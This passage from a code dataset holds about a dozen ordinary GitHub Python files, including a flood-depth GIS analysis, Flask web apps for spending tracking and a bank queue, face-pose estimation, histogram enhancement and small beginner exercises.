keep 4050 patches from the original dataset. In order to obtain the best results, we first shuffle the dataset, then each of the used cameras will be allocated 1350 images.\n\n### 1. randomly permute the numpy matrix\nnumpy_matrix = numpy_matrix[np.random.permutation(numpy_matrix.shape[0]),:]\n### 2. 
allocate 1350 images for each camera\ncamera_each = 1350\nnumpy_matrix = numpy_matrix[np.concatenate((np.where(numpy_matrix[:,0]==0)[0][:camera_each],np.where(numpy_matrix[:,0]==1)[0][:camera_each],np.where(numpy_matrix[:,0]==2)[0][:camera_each])),:]\n\n\n# Then we carry out a sanity check to make sure 1350 samples have been drawn from each camera.\nfor i in range(3):\n assert np.sum(numpy_matrix[:,0] == i) == camera_each\n\n\n# And, in the end, we export the image data matrix to a `parquet` file. `Apache Parquet` allows quick data load and high compression for large datasets. The use of `parquet` with the `brotli` scheme is necessary to limit the size of the output file.\nparq_table = pa.table({f\"i_{i}\": numpy_matrix[i,:] for i in range(numpy_matrix.shape[0])})\npa.parquet.write_table(parq_table, \"dataset.parquet\", compression=\"brotli\")\n\n# This concludes the data wrangling from the original data set. We have reduced the original dimension from 11.3Gb to 98Mb.\n\n#### REMOVE UNNEEDED PICTURES###################\nos.remove(\"input.png\")\nos.remove(\"reference.png\")\n################################################","repo_name":"tinosai/UDA_CW4_NUCERA","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":9814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17012052960","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@author: daisybrown\n\"\"\"\nimport pandas as pd\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# setting the output file\nout_file = \"flood_levels.gpkg\"\n\n# setting a projection variable\nnc_epsg = 2264\n\n\n# reading in the approproate shape files for LIDAR_LAG\nftp_file = \"./Input Files/Columbus_FP_Info.gpkg\"\n\n# setting the layer and projection for the footprint file\n\nftp = gpd.read_file(ftp_file, layer='Building_Centroids') \n\nftp = ftp.to_crs(epsg=nc_epsg)\n\n# trimming the geospatial data for relevent columns\n\ntrim_ftp = ftp.copy()\n\ntrim_ftp = trim_ftp[['FFE', 'LIDAR_LAG', 'LIDAR_HAG','geometry']]\n\n#%%\n\n# reading in the FEMA flood elevations NC One Data\nflood_file = \"flood_sections_static.gpkg\"\nsections = gpd.read_file(flood_file, layer = \"sections\")\nstatic = gpd.read_file(flood_file, layer = \"static\")\n\n\n# setting the projection \n \nsections = sections.to_crs(epsg=nc_epsg)\nstatic = static.to_crs(epsg=nc_epsg)\n\n# trimming the geospatial data for relevent columns\n\n#%%\n\njoined = trim_ftp.sjoin(sections, how='left', predicate='within')\n\njoined = joined.drop(columns='index_right')\n\njoined[\"depth1\"] = round(joined['ELEV'] - joined['LIDAR_LAG'],2)\n\ndepth1 = joined[\"depth1\"]\n\n\njoined = joined.sjoin(static, how='left', predicate='within')\n\njoined = joined.drop(columns='index_right')\n\nFLD_ZONE_left = joined['FLD_ZONE_left']\nFLD_ZONE_right = joined['FLD_ZONE_right']\n\njoined[\"FLD_ZONE\"] = FLD_ZONE_left.where (FLD_ZONE_left.notna(), FLD_ZONE_right)\n\njoined = joined.drop(columns=['FLD_ZONE_left', 'FLD_ZONE_right'])\n\njoined[\"depth2\"] = round(joined['STATIC_BFE_right'] - joined['LIDAR_LAG'],2)\n\ndepth2 = joined[\"depth2\"]\n\njoined['flood_depth'] = depth1.where( depth1.notna(), depth2 )\n\njoined['Class'] = joined['flood_depth'] > 0\njoined['Class'] = joined['Class'].replace({True:\"Low\", False: \"High\"})\njoined['Class'] = joined['Class'].where(joined['flood_depth'].notna(), \"Not FP\")\n\njoined['Water Level'] = joined['flood_depth'].apply(lambda x: f\"{x:.1f} 
ft\")\njoined['Water Level'] = joined['Water Level'].where(joined['Class']=='Low', 'Apparently above flood level')\njoined['Water Level'] = joined['Water Level'].where(joined['Class']!='Not FP', 'Not in floodplain')\n\njoined = joined.drop(columns=['depth1', 'depth2', 'STATIC_BFE_left'])\n\njoined.to_file(out_file, layer = \"flood_depth\", index=False)\n\n\n#%%\n\n# drawing a histogram of negative of negative values \n\nneg_depth = joined.query('flood_depth < 0')\nprint(neg_depth.value_counts('flood_depth'))\n# create a new single-panel figure\n\nneg_depth = neg_depth.reset_index()\n\nfig, ax1 = plt.subplots(dpi=300)\n\n# drawing a histogram of median earnings\n# stat keyword indicates that the Y axis of the histogram should \n# be the probability density\n\nsns.histplot(data=neg_depth, x=\"flood_depth\", ax=ax1)\n\n# The shade option causes the area below the curve to be shaded\n\nax1.set_xlabel(\"Negative Flood Depth\")\n\nfig.tight_layout()\n\nfig.savefig(\"negdepth_hist.png\")\n\n#%%\n\n# drawing a histogram of of all depth values \n\njoined = joined.reset_index()\n\n# create a new single-panel figure\n\nfig, ax2 = plt.subplots(dpi=300)\n\n# drawing a histogram of median earnings\n# stat keyword indicates that the Y axis of the histogram should \n# be the probability density\n\nsns.histplot(data=joined, x=\"flood_depth\", ax=ax2)\n\n# The shade option causes the area below the curve to be shaded\n\nax2.set_xlabel(\"All Flood Depths\")\n\nfig.tight_layout()\n\nfig.savefig(\"alldepth_hist.png\")","repo_name":"daisykbrown/pai789_final_project","sub_path":"script7_flood_depth.py","file_name":"script7_flood_depth.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13767237773","text":"x = 1\nnumbers = [float(0)]\nwhile x > 0:\n num = input (\"Enter a number: \",)\n if num == \"done\":\n break\n else:\n try:\n float(num)\n except:\n print(\"Invalid Input\")\n continue\n num = float(num)\n if x == 1:\n numbers[x-1] = num\n else:\n numbers.append(num)\n x = x + 1\n\nprint(\"The maximum value is: \" + str(max(numbers)))\nprint(\"The minimum value is: \" + str(min(numbers)))","repo_name":"FatherSalvi/lis161-py4e","sub_path":"Ch5Ex2.py","file_name":"Ch5Ex2.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20151877353","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.mobile_optimizer import optimize_for_mobile\n\n\nfrom model import Model, AdaIN\n\n\nclass ConvertModel(nn.Module):\n def __init__(self):\n super(ConvertModel, self).__init__()\n self.model = Model()\n self.model.decoder.state_dict(torch.load('./models/decoder_3.pth', map_location='cpu'))\n self.model.encoder\n\n def forward(self, content, style, alpha=0.6):\n content_f = self.model.encoder(content)\n style_f = self.model.encoder(style)\n feat = AdaIN(content_f, style_f)\n feat = feat * alpha + content_f * (1 - alpha)\n return self.model.decoder(feat)\n\n\nmodel = ConvertModel()\n\ndummy_input = torch.rand(1, 3, 512, 512)\n\ntraced_model = torch.jit.trace(model, (dummy_input, dummy_input))\noptimized_model = optimize_for_mobile(traced_model)\n\noptimized_model.save('style_transfer.pt')\n\nmodel_load = 
torch.jit.load('style_transfer.pt')\n","repo_name":"Picture-GSM/Picture-AI","sub_path":"convert2coreml.py","file_name":"convert2coreml.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24480975155","text":"import openai\nimport pprint\nimport os\n\n\nopenai.organisation = os.getenv(\"OPENAI_ORGANIZATION\")\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\nGPT4 = 'gpt-4-0314'\nMODEL_NAME = GPT4\nmodel = openai.Model(MODEL_NAME)\n\ndef list_all_models():\n model_list = openai.Model.list()['data']\n model_ids = [x['id'] for x in model_list]\n model_ids.sort()\n pprint.pprint(model_ids)\n\nif __name__ == '__main__':\n list_all_models()","repo_name":"JimVincentW/bt-reviewer","sub_path":"oai_models.py","file_name":"oai_models.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"24280887482","text":"from flask import Flask, render_template, request, redirect\nfrom flask import Blueprint\nfrom models.transaction import Transaction\nimport repositories.transaction_repository as transaction_repository\nimport repositories.tag_repository as tag_repository\nimport repositories.merchant_repository as merchant_repository\nimport repositories.limit_repository as limit_repository\n\ntransactions_blueprint = Blueprint(\"transactions\", __name__)\n\n# show all transactions with conditional loops to manage spending limit notificication feature\n@transactions_blueprint.route(\"/transactions\")\ndef transactions():\n transactions = transaction_repository.select_all()\n total = transaction_repository.total_spending()\n limit = limit_repository.select_last()\n near_limit = False\n if total >= limit.notification_point:\n near_limit = True\n over_limit = False\n if total > limit.spending_limit:\n near_limit = False\n over_limit = True\n on_limit = False\n if total == limit.spending_limit:\n near_limit = False\n over_limit = False\n on_limit = True\n return render_template(\"transactions/index.html\", transactions=transactions, total_spend=total, near_limit=near_limit, over_limit=over_limit, on_limit=on_limit)\n\n# show all transactions sorted by date\n@transactions_blueprint.route(\"/transactions/sortby_date\")\ndef transactions_by_date():\n transactions = transaction_repository.select_all_by_date()\n total = transaction_repository.total_spending()\n return render_template(\"transactions/date.html\", transactions=transactions, total_spend=total)\n\n# show all transactions sorted by amount\n@transactions_blueprint.route(\"/transactions/sortby_amount\")\ndef transactions_by_amount():\n transactions = transaction_repository.select_all_by_amount()\n total = transaction_repository.total_spending()\n return render_template(\"transactions/amount.html\", transactions=transactions, total_spend=total)\n\n# takes user to form to add new transaction\n@transactions_blueprint.route(\"/transactions/new\")\ndef new_transaction():\n tags = tag_repository.select_all()\n merchants = merchant_repository.select_all()\n return render_template(\"transactions/new.html\", all_tags=tags, all_merchants=merchants)\n\n# route after pressing submit on 'add new transaction' page, to pull info from the form\n@transactions_blueprint.route(\"/transactions\", methods=['POST']) \ndef create_transaction():\n amount = request.form['amount']\n tag_id = request.form['spending_type']\n merchant_id = request.form['merchant']\n date = 
request.form['date']\n tag = tag_repository.select(tag_id)\n merchant = merchant_repository.select(merchant_id)\n transaction = Transaction(amount, tag, merchant, date)\n transaction_repository.save(transaction)\n return redirect('/transactions')\n\n# takes user to form of selected transaction, to edit transaction\n@transactions_blueprint.route(\"/transactions//edit\", methods=['GET', 'POST'])\ndef edit_transaction(id):\n transaction = transaction_repository.select(id)\n tags = tag_repository.select_all()\n merchants = merchant_repository.select_all()\n return render_template(\"/transactions/edit.html\", transaction=transaction, all_tags=tags, all_merchants=merchants)\n\n# updates the task edited in /transactions/edit form\n@transactions_blueprint.route(\"/transactions/\", methods=['POST'])\ndef update_transaction(id):\n amount = request.form['amount']\n tag_id = request.form['tag']\n merchant_id = request.form['merchant']\n date = request.form['date']\n tag = tag_repository.select(tag_id)\n merchant = merchant_repository.select(merchant_id)\n transaction = Transaction(amount, tag, merchant, date, id)\n transaction_repository.update(transaction)\n return redirect('/transactions')\n\n@transactions_blueprint.route(\"/transactions//delete\", methods=['POST'])\ndef delete_transaction(id):\n transaction_repository.delete(id)\n return redirect(\"/transactions\")\n\n\n","repo_name":"madgelackie/spending_tracker_project","sub_path":"controllers/transactions_controller.py","file_name":"transactions_controller.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72329120091","text":"def adding(numbers):\n return sum(int(digit) for digit in str(numbers))\n\nprint(adding(163783))\n\n\ndef adding(numbers):\n total = 0\n for number in str(numbers):\n total += int(number)\n return total\n\nprint(adding(9876))\n\ndef addNumbers(numbers):\n total = 0\n for x in str(numbers):\n total += int(x)\n return total\n\nprint(addNumbers(423566))\n\ndef addNumbersFromList(numbers):\n total = 0\n for x in numbers:\n total += x\n return total\n\nprint(addNumbersFromList([3, 4, 6, 4, 2, 2, 3]))\n\ndef addingNumbers(numbers):\n total = 0\n for number in str(numbers):\n total += int(number)\n return total\n\nprint(addingNumbers(9876))\n\n\ndef addingDigits(numbers):\n return sum(int(x) for x in str(numbers))\n\nprint(addingDigits(16523783))\n","repo_name":"jakubfolta/AddDigits","sub_path":"AddNumb.py","file_name":"AddNumb.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43462484102","text":"## need opencv, numpy, imutils and dlib installed\n## tuvovan\n\nimport math\nimport cv2\nimport numpy as np \nfrom imutils import face_utils\nimport dlib\n\n# get 2D points\ndef get_2D_points(subject):\n shape = predictor(gray, subject)\n shape = face_utils.shape_to_np(shape) \n left_eye_left = shape[36]\n right_eye_right = shape[45]\n nose_top = shape[33]\n chin = shape[8]\n left_mouth_conner = shape[48]\n right_mouth_conner = shape[54]\n up_eye = shape[37]\n down_eye = shape[40]\n\n return np.array([up_eye, down_eye]), np.array([nose_top, chin, left_eye_left, right_eye_right, left_mouth_conner, right_mouth_conner], dtype='double')\n\n## 3D points\nmodel_points = np.array(\n [\n (0.0, 0.0, 0.0),\n (0.0, -330.0, -65.0),\n (-165.0, 170.0, -135.0),\n (165.0, 170.0, -135.0),\n (-150.0, -150.0, -125.0),\n (150.0, -150.0, -125.0)\n 
]\n)\n\n## Get pose\ndef get_pose(model_points, image_points, frame):\n size = frame.shape\n # focal_length = size[1]\n center = (size[1]/2, size[0]/2)\n focal_length = center[0]/ np.tan(60/2 * np.pi /180)\n\n camera_matrix = np.array(\n [\n [focal_length, 0, center[0]],\n [0, focal_length, center[1]],\n [0, 0 , 1]\n ], dtype = 'double'\n )\n\n dist_coeffs = np.zeros((4,1))\n\n ## new here replace the axis\n axis = np.float32(\n [\n [500,0,0],\n [0,500,0],\n [0,0,500]\n ]\n )\n (_, rotation_vector, translation_vector) = cv2.solvePnP(model_points, image_points, camera_matrix, dist_coeffs)\n\n (nose_end_point2D, jacobian) = cv2.projectPoints(axis, rotation_vector, translation_vector, camera_matrix, dist_coeffs)\n (modelpts, jacobian2) = cv2.projectPoints(model_points, rotation_vector, translation_vector, camera_matrix, dist_coeffs)\n rvec_matrix = cv2.Rodrigues(rotation_vector)[0]\n\n proj_matrix = np.hstack((rvec_matrix, translation_vector))\n\n eulerAngles = cv2.decomposeProjectionMatrix(proj_matrix)[6]\n\n pitch, yaw, roll = [math.radians(_) for _ in eulerAngles]\n\n pitch = math.degrees(math.asin(math.sin(pitch)))\n yaw = math.degrees(math.asin(math.sin(yaw)))\n roll = math.degrees(math.asin(math.sin(roll)))\n\n for p in image_points:\n cv2.circle(frame, (int(p[0]), int(p[1])), 3, (0, 0 , 255), -1)\n p1 = (int(image_points[0][0]), int(image_points[0][1]))\n p2 = tuple(nose_end_point2D[1].ravel())\n p3 = tuple(nose_end_point2D[0].ravel())\n p4 = tuple(nose_end_point2D[2].ravel())\n\n cv2.line(frame, p1, p2, (0, 255 , 0), 3)\n cv2.line(frame, p1, p3, (255, 0 , 0), 3)\n cv2.line(frame, p1, p4, (0, 0 , 255), 3)\n\n\n# add glasses\ndef add_glasses(frame, glasses, left_eye_left, right_eye_right, up_eye, down_eye):\n glasses_width = np.int(np.abs(right_eye_right[0] - left_eye_left[0])*1.3)\n glasses_height = np.int(np.abs(up_eye[1] - down_eye[1])*1.5)\n glasses_resized = cv2.resize(glasses, (glasses_width, glasses_height))\n transparent_region = glasses_resized[:,:,:3] != 0\n\n frame[int(left_eye_left[1]):int(left_eye_left[1])+glasses_height, int(left_eye_left[0]):int(left_eye_left[0])+glasses_width,:][transparent_region] = glasses_resized[:,:,:3][transparent_region]\n # frame[int(left_eye_left[0]):int(right_eye_right[0]),int(left_eye_left[1]):int(right_eye_right[1]), :][transparent_region] = glasses_resized[:,:,:3][transparent_region]\n\n\n\ncap = cv2.VideoCapture(0)\nprint(\"[INFO] loading facial landmark predictor...\")\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')\nsunglasses = cv2.imread('sunglasses.png')\nwhile True:\n ret, frame = cap.read()\n frame = cv2.resize(frame, (600, 600))\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n subjects = detector(gray, 0)\n\n for subject in subjects:\n up_down, image_points = get_2D_points(subject)\n get_pose(model_points, image_points, frame)\n add_glasses(frame, sunglasses, image_points[2], image_points[3], up_down[0], up_down[1])\n frame = cv2.flip(frame, 1)\n cv2.imshow('out', frame)\n key = cv2.waitKey(1) & 0xFF\n if key == ord('q'):\n break\ncv2.destroyAllWindows()\ncap.release()","repo_name":"tuvovan/Face-Pose-Estimation","sub_path":"face_pose.py","file_name":"face_pose.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31548998477","text":"n = int(input(\"Enter number of students: \"))\n\nstd_dict = []\n\nfor i in range(1, n+1):\n name = input()\n mark = 
int(input())\n std_dict.append({i: {\"student_name\": name, \"student_mark\": mark}})\n\nf = open(\"out.txt\", \"a\")\nf.write(str(std_dict))\nf.close()\n","repo_name":"sheikhlimon/phitron-course","sub_path":"course_4_oop/module_11/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12792736850","text":"# Imports\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mtick\n\n# Settings\nsns.set_style(\"white\")\n\n\ndef create_barcharts(new_season, model, dain_version=False):\n main_color = \"#f07f71\" if not dain_version else \"#EA9B2A\"\n sat = 0.75 if not dain_version else 1\n\n # Read data\n df = pd.read_csv(f\"results/all_predictions_{model}_{new_season}.csv\")\n # Normalize probabilities\n df[\"Norm_prob\"] = df[\"Prob\"] / df.Category.map(\n df.groupby(\"Category\")[\"Prob\"].sum().to_dict()\n )\n # Format as percentage\n df[\"Norm_prob\"] *= 100\n\n for cat in df.Category.unique():\n df_plot = df[df.Category == cat].copy()\n df_plot = df_plot.sort_values(\"Norm_prob\", ascending=False)\n df_plot[\"Hundred_percent\"] = 100\n\n # Create plot\n fig, ax = plt.subplots(figsize=(8, 3))\n # Background (100%)\n sns.barplot(\n data=df_plot,\n x=\"Hundred_percent\",\n y=\"Nominee\",\n orient=\"h\",\n saturation=sat,\n color=\"#d3d3d3\",\n )\n # Plot probabilities\n sns.barplot(\n data=df_plot,\n x=\"Norm_prob\",\n y=\"Nominee\",\n orient=\"h\",\n saturation=sat,\n color=main_color,\n )\n # Aesthetics\n ax.xaxis.set_major_formatter(mtick.PercentFormatter())\n if dain_version:\n ax.spines[\"left\"].set_color(\"#113341\")\n ax.spines[\"right\"].set_color(\"#113341\")\n ax.spines[\"bottom\"].set_color(\"#113341\")\n ax.spines[\"top\"].set_color(\"#113341\")\n ax.yaxis.label.set_color(\"#113341\")\n ax.xaxis.label.set_color(\"#113341\")\n ax.tick_params(axis=\"x\", colors=\"#113341\")\n ax.tick_params(axis=\"y\", colors=\"#113341\")\n\n plt.xlim((0, 100))\n plt.ylabel(\"\")\n if cat == \"Picture\":\n ax.set_yticklabels(df_plot[\"Film\"])\n else:\n ax.set_yticklabels(list(df_plot[\"Nominee\"] + \" - \" + df_plot[\"Film\"]))\n plt.xlabel(\"\")\n plt.tight_layout()\n plt.savefig(f\"results/predictions_barchart_{model}_{new_season}_{cat}.png\")\n plt.close(\"all\")\n\n\ncreate_barcharts(new_season=\"2023\", model=\"rf\", dain_version=False)\n","repo_name":"MateVaradi/OscarPrediction","sub_path":"prediction_viz.py","file_name":"prediction_viz.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"19898288458","text":"import optparse\nimport signal\nimport sys\n\nfrom proton import symbol\nfrom proton.handlers import MessagingHandler\nfrom proton.reactor import Container\n\n\nclass FailoverServer(MessagingHandler):\n def __init__(self, address):\n super(FailoverServer, self).__init__()\n self.listener = None\n self.address = address\n\n def on_start(self, event):\n self.listener = event.container.listen(self.address)\n\n def stop(self):\n if self.listener:\n self.listener.close()\n\n def on_connection_opening(self, event):\n # Sends an empty failover list.\n # This will test the case where we deliberately send an empty failover list so that the router\n # receiving this open frame will clean out its failover list.\n event.connection.properties = {\n symbol('failover-server-list'): []\n }\n\n\nparser = 
optparse.OptionParser(usage=\"usage: %prog [options]\",\n description=\"Testing Router failover support\")\n\nparser.add_option(\"-a\", \"--address\", default=\"localhost:55671\",\n help=\"address to listen on (default %default)\")\n\nopts, args = parser.parse_args()\n\nhandler = FailoverServer(opts.address)\n\n\ndef sigterm_handler(_signo, _stack_frame):\n sys.exit(0)\n\n\nsignal.signal(signal.SIGTERM, sigterm_handler)\n\nContainer(handler).run()\n","repo_name":"skupperproject/skupper-router","sub_path":"tests/failoverserver.py","file_name":"failoverserver.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"35605674676","text":"import ipcv\nimport numpy\n\ndef histogram_enhancement(im, etype='linear2', target=None, maxCount=255):\n\t\"\"\"\n\tTitle: histogram_enhancement\n\tAuthor: Molly Hill, mmh5847@rit.edu\n\tDescription:\n\t\tReturns given image quantized at set number of levels, using either a uniform or IGS method.\n\tAttributes:\n\t\tim - ndarray, can be grayscale or color of any size\n\t\tetype - enhancement type, of the following options:\n\t\t\t - 'linearX' where X is an integer percent of the area to be\n\t\t\t clipped/crushed with contrast increas\n\t\t\t - 'match' where the image is to be matched to a provided\n\t\t\t target image or PDF\n\t\t\t - 'equalize' where the image's histogram is to be spread\n\t\t\t equally across digital count\n\t\ttarget - if etype = 'match', then target must be provided as either an\n\t\t\t image (3D array) or PDF (1D array)\n\t\tmaxCount - maximum code value of pixel; must be positive integer\n\tRequires:\n\t\thistogram.py, author: Carl Salvaggio\n\t\tdimensions.py, author: Carl Salvaggio\n\t\"\"\"\n\n\tif maxCount <= 0 or type(maxCount) is not int:\n\t\tmsg = \"Specified maximum digital count must be a positive integer.\"\n\t\traise ValueError(msg)\n\tif type(im) is not numpy.ndarray:\n\t\tmsg = \"Specified image type must be ndarray.\"\n\t\traise TypeError(msg)\n\tif etype[:6] != 'linear' and etype != 'match' and etype != 'equalize':\n\t\tmsg = \"Enhancement types available are linear, match, and equalize. 
Defaulting to linear2.\"\n\t\tprint(msg)\n\tif etype == 'match':\n\t\tif type(target) == None:\n\t\t\tetype = 'equalize'\n\t\t\tmsg = \"If using match, target must be provided.\"\n\t\t\tprint(msg)\n\t\telif target.ndim !=1 and target.ndim !=2:\n\t\t\tprint(target.ndim)\n\t\t\tmsg = \"Provided target must be PDF (1-D array) or image (3-D array)\"\n\t\t\traise TypeError(msg)\n\n\tenhIm = numpy.copy(im)\n\tsrcCDF = ipcv.histogram(enhIm)[2]\n\tDCout = []\n\ttgtCDF = []\n\ttgtPDF = target\n\t\n\tif etype == 'match' or etype == 'equalize':\n\t\tif etype == 'match' and target.ndim != 1: #is image\n\t\t\ttgtCDF = ipcv.histogram(target)[2][0] #create CDF of target, currently does red channel if color\n\t\telse: #equalize or PDF passed in as target for matching\n\t\t\tif etype == 'equalize':\n\t\t\t\ttgtPDF = numpy.ones(maxCount+1)/(maxCount+1)\n\t\t\ttgtCDF = numpy.cumsum(tgtPDF) #convert PDF to CDF\n\n\t\tfor i in range(ipcv.dimensions(srcCDF)[1]): #createLUT\n\t\t\tdifference = numpy.fabs(numpy.subtract(tgtCDF,srcCDF[0][i])) #red channel only\n\t\t\tDCout.extend([int(maxCount*tgtCDF[numpy.argmin(difference)])])\n\t\tfor j in range(im.size): #apply LUT\n\t\t\tenhIm.flat[j] = DCout[enhIm.flat[j]] #uses original code value to assign new output from LUT\n\n\telse: #linear\n\t\tpct = (int(etype[6:])/2) / 100 #extract percent from etype and halve\n\t\tdifference = numpy.fabs(numpy.subtract(srcCDF[0],pct))\n\t\tDCmin = numpy.argmin(difference)\n\t\tdifference = numpy.fabs(numpy.subtract(srcCDF[0],(1-pct)))\n\t\tDCmax = numpy.argmin(difference)\n\n\t\tslope = (maxCount+1)/(DCmax-DCmin)\n\t\tintercept = -slope * DCmin\n\t\t\n\t\tfor j in range(enhIm.size):\n\t\t\tpx = enhIm.flat[j]\n\t\t\tif px >= DCmax:\n\t\t\t\tpx = maxCount\n\t\t\telif px <= DCmin:\n\t\t\t\tpx = 0\n\t\t\telse:\n\t\t\t\tpx = slope * px + intercept\n\t\t\tenhIm.flat[j] = int(px)\n\n\treturn enhIm\n\nif __name__ == '__main__':\n\n\timport cv2\n\timport os.path\n\timport time\n\n\thome = os.path.expanduser('~')\n\tpath = os.path.join(home, 'src', 'python', 'examples', 'data')\n\tfilename = os.path.join(path, 'lenna.tif')\n\tfilename = os.path.join(path, 'giza.jpg')\n\tfilename = os.path.join(path, 'crowd.jpg')\n\tfilename = os.path.join(path, 'redhat.ppm')\n\n\tmatchFilename = os.path.join(path, 'redhat.ppm')\n\tmatchFilename = os.path.join(path, 'crowd.jpg')\n\tmatchFilename = os.path.join(path, 'giza.jpg')\n\tmatchFilename = os.path.join(path, 'lenna.tif')\n\n\tim = cv2.imread(filename, cv2.IMREAD_UNCHANGED)\n\tprint('Filename = {0}'.format(filename))\n\tprint('Data type = {0}'.format(type(im)))\n\tprint('Image shape = {0}'.format(im.shape))\n\tprint('Image size = {0}'.format(im.size))\n\n\tcv2.namedWindow(filename, cv2.WINDOW_AUTOSIZE)\n\tcv2.imshow(filename, im)\n\n\tprint('Linear 2% ...')\n\tstartTime = time.time()\n\tenhancedImage = ipcv.histogram_enhancement(im, etype='linear2')\n\tprint('Elapsed time = {0} [s]'.format(time.time() - startTime))\n\tcv2.namedWindow(filename + ' (Linear 2%)', cv2.WINDOW_AUTOSIZE)\n\tcv2.imshow(filename + ' (Linear 2%)', enhancedImage)\n\n\tprint('Linear 1% ...')\n\tstartTime = time.time()\n\tenhancedImage = ipcv.histogram_enhancement(im, etype='linear1')\n\tprint('Elapsed time = {0} [s]'.format(time.time() - startTime))\n\tcv2.namedWindow(filename + ' (Linear 1%)', cv2.WINDOW_AUTOSIZE)\n\tcv2.imshow(filename + ' (Linear 1%)', enhancedImage)\n\n\t#print('Equalized ...')\n\t#startTime = time.time()\n\t#enhancedImage = ipcv.histogram_enhancement(im, etype='equalize')\n\t#print('Elapsed time = {0} 
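As a side note (not part of the original script): the per-pixel `for j in range(im.size)` loops above can be replaced by a single NumPy fancy-indexing lookup, which applies an entire lookup table at once. The sketch below assumes an 8-bit image (`maxCount = 255`) and `dc_max > dc_min`.

import numpy as np

def apply_lut(im, lut):
    """Apply a lookup table to every pixel via fancy indexing (vectorized).

    `im` must be an integer array; each code value indexes its replacement.
    """
    lut = np.asarray(lut, dtype=np.uint8)
    return lut[im]

def linear_stretch_lut(dc_min, dc_max, max_count=255):
    """Build the LUT for a linear contrast stretch between dc_min and dc_max."""
    x = np.arange(max_count + 1, dtype=np.float64)
    y = (x - dc_min) * (max_count + 1) / (dc_max - dc_min)
    return np.clip(y, 0, max_count).astype(np.uint8)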
[s]'.format(time.time() - startTime))\n\t#cv2.namedWindow(filename + ' (Equalized)', cv2.WINDOW_AUTOSIZE)\n\t#cv2.imshow(filename + ' (Equalized)', enhancedImage)\n\n\t#tgtIm = cv2.imread(matchFilename, cv2.IMREAD_UNCHANGED)\n\t#print('Matched (Image) ...')\n\t#startTime = time.time()\n\t#enhancedImage = ipcv.histogram_enhancement(im, etype='match', target=tgtIm)\n\t#print('Elapsed time = {0} [s]'.format(time.time() - startTime))\n\t#cv2.namedWindow(filename + ' (Matched - Image)', cv2.WINDOW_AUTOSIZE)\n\t#cv2.imshow(filename + ' (Matched - Image)', enhancedImage)\n\n\t#tgtPDF = numpy.ones(256) / 256\n\t#print('Matched (Distribution) ...')\n\t#startTime = time.time()\n\t#enhancedImage = ipcv.histogram_enhancement(im, etype='match', target=tgtPDF)\n\t#print('Elapsed time = {0} [s]'.format(time.time() - startTime))\n\t#cv2.namedWindow(filename + ' (Matched - Distribution)', cv2.WINDOW_AUTOSIZE)\n\t#cv2.imshow(filename + ' (Matched - Distribution)', enhancedImage)\n\n\taction = ipcv.flush()\n\n","repo_name":"mollymh/misc_image_processing","sub_path":"histogram_enhancement.py","file_name":"histogram_enhancement.py","file_ext":"py","file_size_in_byte":5645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35479987032","text":"from flask import Flask\nfrom flask import request\nfrom flask import jsonify\nfrom flask_cors import CORS\n\napp = Flask(__name__)\napp.config[\"DEBUG\"] = True\nCORS(app)\n\n# Fila\nqueue = []\n\n# Mesas e Caixa de atendimento\nservice_desk = {\n \"caixa\": {\n \"desk_1\": {\n \"nameDesk\": \"Mesa 01\",\n \"statusBusy\": False,\n \"type\": \"Prioridade\"\n },\n \"desk_2\": {\n \"nameDesk\": \"Mesa 02\",\n \"statusBusy\": False,\n \"type\": \"Convencional\"\n }\n },\n \"gerencia\": {\n \"desk_1\": {\n \"nameDesk\": \"Mesa 03\",\n \"statusBusy\": False,\n \"type\": \"Prioridade\"\n },\n \"desk_2\": {\n \"nameDesk\": \"Mesa 04\",\n \"statusBusy\": False,\n \"type\": \"Convencional\"\n }\n },\n \"guiche\": {\n\n \"desk_1\": {\n \"nameDesk\": \"Caixa 01\",\n \"statusBusy\": False,\n \"type\": \"Prioridade\"\n },\n \"desk_2\": {\n \"nameDesk\": \"Caixa 02\",\n \"statusBusy\": False,\n \"type\": \"Convencional\"\n }\n },\n}\n\nnumero_caixa = 0\nnumero_guiche = 0\nnumero_gerencia = 0\n\n\ndef numero_ticket(setor):\n global numero_caixa\n global numero_guiche\n global numero_gerencia\n\n if setor == 'Caixa':\n numero_caixa += 1\n return numero_caixa\n\n if setor == 'Guichê':\n numero_guiche += 1\n return 